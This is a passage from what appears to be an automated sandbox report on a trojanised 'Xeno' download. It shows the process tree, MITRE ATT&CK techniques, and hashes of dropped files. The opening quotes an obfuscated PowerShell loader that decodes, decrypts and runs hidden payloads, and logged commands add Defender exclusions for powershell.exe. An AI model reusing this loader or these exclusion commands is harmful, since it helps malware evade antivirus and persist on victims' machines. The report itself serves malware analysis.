([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        
        PID:5784
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5940
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2876
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4524

C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\Xeno.exe
"C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\Xeno.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:6204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\3945433c-d789-425e-8a8d-38f599a0df68.tmp

Filesize
8KB

MD5
a0989ec703b9cfefb27e58868ddc9e36

SHA1
3b907d11f1f692ede2f08a191cec3de6d176f6c8

SHA256
7b94ba2cb10354bc6cc094c4b525b4e04ab89bffdcb037847ef72ea68dc31325

SHA512
f62b3c7e1933c78049f4bea00639419baa2a6997599e95980dba2cf778cf7972984d5ddc45c20b799850868966426e5a15ef7305bd6fae5f0e52e9229c299933

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4c2eb126a03012e4645cbf12fa576adb

SHA1
f4fc0dbbe2fca0aab23014eeee6d533aad91b5fb

SHA256
ce9774b847a66f7dce4153518d56469986dedfe78acbcca8e97a64d21df5a1ec

SHA512
40008285483a37d186c6feaaea96e92f8d665193eb2cd4af0ccd2e77544fa2afedd8aa89b8f09e49e1d6960cbe8543389151d2413c8be408794b70da0eb122e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
501a25f290332c25255eaaf70ee6f240

SHA1
23cba10495d7098ad6de6936cf31c1b0eefd1246

SHA256
420c031363bcb69b4cc540b0afad7180d21b4957a2d6eabe23a40e669aeeebcc

SHA512
84ba813e4036be7d9fa08d5fab885421017d008f8fe8d99f56313b54f490c9151a27a67734bb17101691df563efef7e5379250f476e869a848f225786a913081

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
e5a48cb69bd446c3530932895f3bbda2

SHA1
f40b533080ac2c943d41d4b3de998e7259589247

SHA256
4596c1ef048d2eda453000a4ecc3e77d50ea47039fbd639d3d572b57eca41d6e

SHA512
9cb8eb9049d85f44e24139029c8da3cf6a9749878ba7a2db58229cc2148ea67e7edc19ff8a2e7d6a0c829268e6dd3665a540e09384848fe8d2343b3a8348cc72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
fe4518a36e555ce10a699ac36478ac52

SHA1
d32cebb0604ff125f4b9eb79af26284b21d33f47

SHA256
744be167c77272e5a92be00d993b87df1e327da9a78e41dc3600bcf7171119d1

SHA512
d2ae2e0e1e25dc535b7aad75f05ca54f88f54ad2a93905a309a9ca898a6309a8a8cfd983e4c341777a47da693e080b5518501c7e5c8312dd4e08dc4909db7b38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
391B

MD5
5443244819526c00cac01d095e2bf58f

SHA1
c8cbae51c0d5ccaf8cefd43834893204bf6081dd

SHA256
51b41792d3e73abdcb83e89e005cf3e188c9caac9cfdc2dcf7c5367c6fd65ceb

SHA512
395c5a9a2c2b636ecebcf436128215d582c6a30e89a58fb7ae27b8eddd7b5be1f8b72e43880233cfd2fcf761aa5a1b50f6fde026462bc72db2bacee37caf50cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe58b476.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b8183edb5f969772447d6beeb04d8e2f

SHA1
4a64506bfb677c432a2a225acaba981dcf40def4

SHA256
0115333c2db86be23cf52b487d6cb255e75e3377ddad6c56888dc9f105a8af64

SHA512
0550f321f08d91d86a4ab9f0a8b55941ba5eb699a27c9af02df307bdbfd905edc1dfbb354243bb01fdc1c5bebda7ddea5798d005f557aa86538d487d5102f925

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
5b34c5e04acfa9bd26915278d8d2cc86

SHA1
2ab7173d2dccbd973a4e26aec82d7c2c6c9f8456

SHA256
288d111dd3f07214b6b1408341fbee98945bff4b22b6f79248da3de174c376a6

SHA512
c0d9a6b49fb919ba5c5b3a485162ecd48d3c95b2ec21b1a42f14cbfdb511600f617df9200c35705df033cb92e4a706560cb01b9718f688883f1a2d3d724fb104

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
1e9e6b16bd31f29a07dc0b0add3ad40e

SHA1
343ea51e7e95b4327a0fa312fa34d3bcc0a6d6dd

SHA256
04b027f924864635d1321f232237c086960e782729ab7fdffe3b1e4dc1352906

SHA512
7fa14d8fe5f6e325ba3da2e9e31a54a606503d8a03fdd68f3e3d268bed6b9ffbe677243d0e7ac2d0fe7d242b27bc8724c7492a44baff4a9c6c330499174ed4c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
94ce4b2ff0abce6d838ac24a1b0f4e73

SHA1
02f4a956ed4f2e2e0ca9c4b75bf8e7245a1cec88

SHA256
06180545891f02875414f56a2a8ca3f21c2f415e03644674cff1c9674cb9b222

SHA512
b3bf05777fa4abbd7c475657dea5ca9c00600ab6226843150eff563837c3232c3b513afc0ac5ff1976e35979a51f34710ab74582d1316282bdcb67cc17493c90

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
ef30b5850d78b050b13ae82ee13c6b28

SHA1
25bcd922ab2c62d47c9bfac3fafcca08317ad8e5

SHA256
dfd732ede1af0d6dc560b9fbef26f92f9fdf83a72da3e6910cb39843be4fed30

SHA512
f9bdbddff6fe99cacf3a670ab5504849668c9049053eca2a4b51f74eb050ea4d60629ce29a571223b1cf293101d646067f9f00e4fb3039738921e1c042419f8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
a687b911db548fc0b637e3049242b173

SHA1
2a3e832441c74036afa3dc470f6ea06aed0f682e

SHA256
cf10f952fde50d777bcc5b8f3821a3de697de0a60c0cc393b33d098afcbe93b6

SHA512
3c96ba4881f7832d79ed9c450ec2eddfa803b64a352662d967c11d0cb84669dfdf2ce816b88f195cda3ec77f8481eeeda416289c4f5620382114ada4013a8eb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0b4c753070e7ae6269b0706626942e3

SHA1
201236b71ef5dd72b224d9d1dcc96ef6c20cdbd9

SHA256
0779424800c7c6d0f29de4125f183ff463d14c110e74c976defb93cd302703e2

SHA512
9834d4f27f3be7e308b2802f55b792ee73cc0750d3af6be94e0da180b68a03214d0864f738a6f6436d430b2e3add83067aca6b30eb71268552a9f4272b21a420

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c67441dfa09f61bca500bb43407c56b8

SHA1
5a56cf7cbeb48c109e2128c31b681fac3959157b

SHA256
63082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33

SHA512
325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a8dc775649664c3a2f5fa27a58f3a0c

SHA1
d6ab95aa1173b3905a5331d3b64c1bd468ffc483

SHA256
c98a5947c75bda96ad9426a9cf026ed75bcfb0f40d54b0f31f5057cc9b54d1dd

SHA512
29ad925827808c18dc114082af81c7a2bc5e82270437d49f8328939abe0a1387ff9c6226e98703c3dba2e67eb3108b4de990bc8985a3e68b0e40c92ba4ac9e91

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jdqt4zjh.sxu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
fc062f532c3bac961c2127b5c1a0433b

SHA1
067e930fadd19a01d38526c0aa8e4d52e11379a6

SHA256
737d5a25874f66469647a26628f8b8578c03273362cdb5c1e152acc3cfc5807c

SHA512
23b26fa0d0ac1ba1faa5dbca1886bb608bc4a43cad179deb0ded9f1e9874a7162d1fdefa1a0098636cb3bd9fd56c49a358e7236c7a8d6479a46c92dbe92f9bfa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
4ddcc51fefb8233c04b5d74049851d29

SHA1
d4cefae0ba71f145957b86cd67276fb8647c49fb

SHA256
14ee789964974236bc9dd52ba4fddf7400c49e25c00a66b0e6178d77a21dda66

SHA512
5fc50fdbca71628d248365f5dabdcc5e82cd11dc281005ac33ce66ddfc37bd40bcb4cebc64fce0cc2323f3ee72a86e57b625d44e23ee15a852a9179804f93e5a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_468.vbs

Filesize
115B

MD5
a550808471debd8425b8187694cfb09f

SHA1
e595af78fba1f6d6bb3b26ec1fdb22b725fde2a0

SHA256
06d169eb91310d140aa4d723fa03b6b4cf656ec0affc838fc214220c15896772

SHA512
acc7e3246eed239bee31c8055e74d9ebb837a89ff4760732ba2482528e275ed4ca0faeefc2420e043ef992287b4a124bdd2695437e9cff26af8dbacd464c9675

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 343076.crdownload

Filesize
5.1MB

MD5
3d3771b2b441ceb420e3d673c5b95097

SHA1
b782da1cada16382c4c47a7f822765967cbbb794

SHA256
f32fc3a2a760ea47fe18e746f6ccea53bc9adc4436916357df13926646f1cdeb

SHA512
efe63d90bd010b1498a23be95cdd6d1334bf7fc4c138dfea8cc1476447c4ebd29ee70cd7591beec95e0a18e32c6c13f16c30f6d964a2e7b7e524b69d16d7d355

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\MSVCP140.dll

Filesize
439KB

MD5
4d157073a891d0832b9b05fb8aca73a8

SHA1
551efcdd93ecafc6b54ebb6f8f38c505d42d61ca

SHA256
718812adb0d669eea9606432202371e358c7de6cdeafeddad222c36ae0d3f263

SHA512
141563450e4cdf44315270360414f339fc3c96ebdaa46e28a1f673237c30f5e94e6da271db67547499c14dc3bd10e39767c3b6a2a3c9cec0a64a11f0263e0c5d

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\Microsoft.Web.WebView2.Wpf.dll

Filesize
50KB

MD5
4a292c5c2abf1aab91dee8eecafe0ab6

SHA1
369e788108e5fb0608a803fa2e5a06690b4464b5

SHA256
b628d6133bf57b7482a49aa158e45b078df73ee7d33137ac1336d24ac67ed1b4

SHA512
ca22adfff9789730e4c02343e320d80b8466cfc5a15f662cefe376b7ee29dea571004c1c26cd3f50c0d24e646f2b36b53fa86835678f46f335d65eec52431cde

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\Xeno.dll

Filesize
1.2MB

MD5
8363219b62cf490fea5571d5b779c174

SHA1
3d259f711d21053b7323a740e8c256ca77c64efd

SHA256
9840c97b35afb77418d541ef2f1b5da93c0d7d9632c334ec7444ceadeb0f9fa8

SHA512
70874a58bbcc263e1c929e479bde31e731cb26cec6a51081f3d33ae37be32b4c9e96a36306d997f12a81e0867bc13a0c32baf14c52b9f1dfab894decf7305a22

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\Xeno.exe

Filesize
140KB

MD5
f0d6a8ef8299c5f15732a011d90b0be1

SHA1
5d2e6cc0bd4f1e810808f2a284f6c2a30b21edcf

SHA256
326bae0bd1398234dcef4c3d71f00e30cc9b447fa963e21d6f29605f42bb7e5b

SHA512
5b9f1517949a7fa9fdb7413146632d21a4208dc92823b673af85963ae5cc7f827b3ba27f3e9c5554c45e726ad159aac77d30306acc3559bd8712534e41ff0f27

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\Xeno.exe.WebView2\EBWebView\Default\DawnGraphiteCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\Xeno.exe.WebView2\EBWebView\Default\DawnWebGPUCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\Xeno.exe.WebView2\EBWebView\Default\DawnWebGPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\Xeno.exe.WebView2\EBWebView\Default\DawnWebGPUCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\Xeno.exe.WebView2\EBWebView\Default\Shared Dictionary\cache\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\XenoUI.deps.json

Filesize
2KB

MD5
f264dff8b12b6341b6bb97f9cea46324

SHA1
f8f19c048eacb31fb11b88d2a14b02cb3b7dbd74

SHA256
16b09c4fa7b6b3b75ded9a5ea854ad0b1b88288969376c94de1546cd02a82905

SHA512
4c69f803f0c48cff3da3b862dcad62b5c29af197f83d52cbf176c91e16752f883aea5ccb264aec66c2af179e038b5cf98439561ce08ffd31fc8b385486c67b93

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\XenoUI.dll

Filesize
95KB

MD5
38246fb0d91772bb188b74956fcac653

SHA1
5b513501576bfd408c002bc7e3937222bd5880da

SHA256
5467a08450f3330e5aecfcac90b7e2f6005b7031b2e900c6080e894ff435223a

SHA512
66c2db8045386a2e3cf43cd56c9fc72d34108a4092fec0ef83c4817a6e2484ddde4d3366228532cbe60bff02d6e28b6c7354c749db955de236396dc29116251a

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\XenoUI.runtimeconfig.json

Filesize
515B

MD5
e0f6f18f9b152bc2d8c710b0214805d6

SHA1
ae3d39e59fd6edc05792a76cdf4f02a637f52e29

SHA256
89ad1ea5c9c20b6b266547ef27c0ae3840cab5642d3c2aedf06b7026245671dd

SHA512
80a6a9ff925bd1ba6f57fa1f7dd40de962001af97f8c2477d0b502728e23b6f412c74134e33efb36ccfeb08bbbeb678beb7e2e52fad24a763967eba8cf09b29e

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\libcrypto-3-x64.dll

Filesize
5.0MB

MD5
54ca3e6afcb3c57c7914c0856d779f2a

SHA1
e37be8d92350aa1f9dd3212015de959faa58aa2f

SHA256
7aed0bc00d2f0ca0de95eaa6461327bd2e4543723a6ca443a7e899738b353b5a

SHA512
e8079e9d4bfa253677a669913f8198882c2eaaf9251f11cfa64eed5597c34ab7c267bed3826ad9f0a83675177a7575af54081852a5a633d999bd13cf873a79e8

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\libssl-3-x64.dll

Filesize
1.3MB

MD5
d66acb55a9f095a24865c9d883f96fd1

SHA1
cc8cb0a1d460fc0ef5a941bc5cd45e29ca7ef527

SHA256
7ae563b23164ec5994dbc24bce536b33df80c40de5ca97d64fe84a5dac34788e

SHA512
35c04c6f5f66d4585bba8fe48f2b470af7d6e366e9b9cb3ce0712818c5b1504c9e492a4d148164adf28793cc55b2ac58d3df28fb00f94033ddcb6e18ecce0227

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\vcruntime140.dll

Filesize
117KB

MD5
943fc74c2e39fe803d828ccfa7e62409

SHA1
4e55d591111316027ae4402dfdfcf8815d541727

SHA256
da72e6677bd1bcd01c453c1998aaa19aeaf6659f4774cf6848409da8232a95b2

SHA512
96e9f32e89aee6faea6e5a3edc411f467f13b35ee42dd6f071723daeba57f611dbd4ff2735be26bb94223b5ec4ee1dffedf8dc744b936c32a27d17b471e37dcf

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\vcruntime140_1.dll

Filesize
48KB

MD5
05052be2c36166ff9646d7d00bb7413f

SHA1
d8d7c4b322d76e3a7b591024c62f15934979fe40

SHA256
26e470b29bed3d873e0c328186e53f95e9edbfe0b0fd0cda44743a0b1a04a828

SHA512
0460cc66d06df9a2941607473f3eccfd909f2adab53a3328fadcedd1b194b388eca738c2c6c2e193de33606925fbed1fe39efa160015128e93f5e3a03c62170d

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\xrequirement.bat

Filesize
272KB

MD5
4c4bec384271b4077b1cd56d0e9733fd

SHA1
a4b70ac73c1d4bb0a03ec598fee4133834e550a1

SHA256
9145ee862b20a7a14b068995c8b917c1113a471c04d05e3d2adf25df8ead1002

SHA512
d0f10bf9fa0f88cfad45c2510c40d42242d878553633d2db80f7a4e1149a3e9ba53f19ef1b140d66af5c08bf1e489074d56ce6c5b4765fb91b435e653ff79961

Download Submit
memory/5784-650-0x000001F4E5B20000-0x000001F4E5B2C000-memory.dmp

Filesize
48KB

Download
memory/5784-605-0x000001F4E4C50000-0x000001F4E4C62000-memory.dmp

Filesize
72KB

Download
memory/6668-573-0x0000019BFB7F0000-0x0000019BFB826000-memory.dmp

Filesize
216KB

Download
memory/6668-562-0x0000019BFB550000-0x0000019BFB572000-memory.dmp

Filesize
136KB

Download
memory/6668-572-0x0000019BFB540000-0x0000019BFB548000-memory.dmp

Filesize
32KB

Download